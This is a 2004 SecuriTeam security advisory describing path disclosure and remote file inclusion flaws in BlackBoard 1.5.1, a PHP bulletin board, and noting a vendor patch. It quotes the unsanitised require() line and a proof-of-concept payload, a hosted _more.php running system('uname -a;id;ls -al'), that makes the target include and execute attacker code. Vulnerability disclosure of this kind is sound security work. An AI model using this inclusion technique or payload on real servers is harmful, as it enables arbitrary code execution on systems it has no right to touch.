[UNIX] BlackBoard Path Disclosure and File Inclusion Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
To: firstname.lastname@example.org Date: 11 Oct 2004 19:16:48 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
- - - - - - - - -
BlackBoard Path Disclosure and File Inclusion Vulnerabilities
<http://blackboard.unclassified.de/> BlackBoard is "an open-source,
PHP-based internet bulletin board software, almost like any other around".
Two vulnerabilities have been discovered in BlackBoard, a path disclosure
vulnerability and a file inclusion vulnerability. Using the file inclusion
vulnerability it is possible to cause the remote site to execute arbitrary
code, using the path disclosure vulnerability it is possible to discover
the true path under which the product has been installed.
* BlackBoard version 1.5.1
By requesting the following file it is possible to retrieve the actual
path under which the BlackBoard product is installed:
The response would look like:
Warning: main(lang/_more.php): failed to open stream: No such file or
directory in /www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
Fatal error: main(): Failed opening required 'lang/_more.php'
/www/web002/_blackboard/bb_lib/checkdb.inc.php on line 15
The same issue also occurs in admin.inc.php, cp.inc.php and others.
The /bb_lib/admin.inc.php incorrectly uses the following unsensitized
require function call:
require($libpath . 'lang/' . $LANG . '_more.php');
Meaning anyone can replace the libpath parameter with whichever file they
desire causing the inclusion of arbitrary files.
Create a file called _more.php on your web site with the following
system("uname -a;id;ls -al");
Then issue a request of the sorts of, to cause it to get included and
The vendor has issued a patch that addresses this issues.
The information has been provided by <mailto:Cracklove@gmail.com> Lin
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: email@example.com
In order to subscribe to the mailing list, simply forward this email to: firstname.lastname@example.org
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.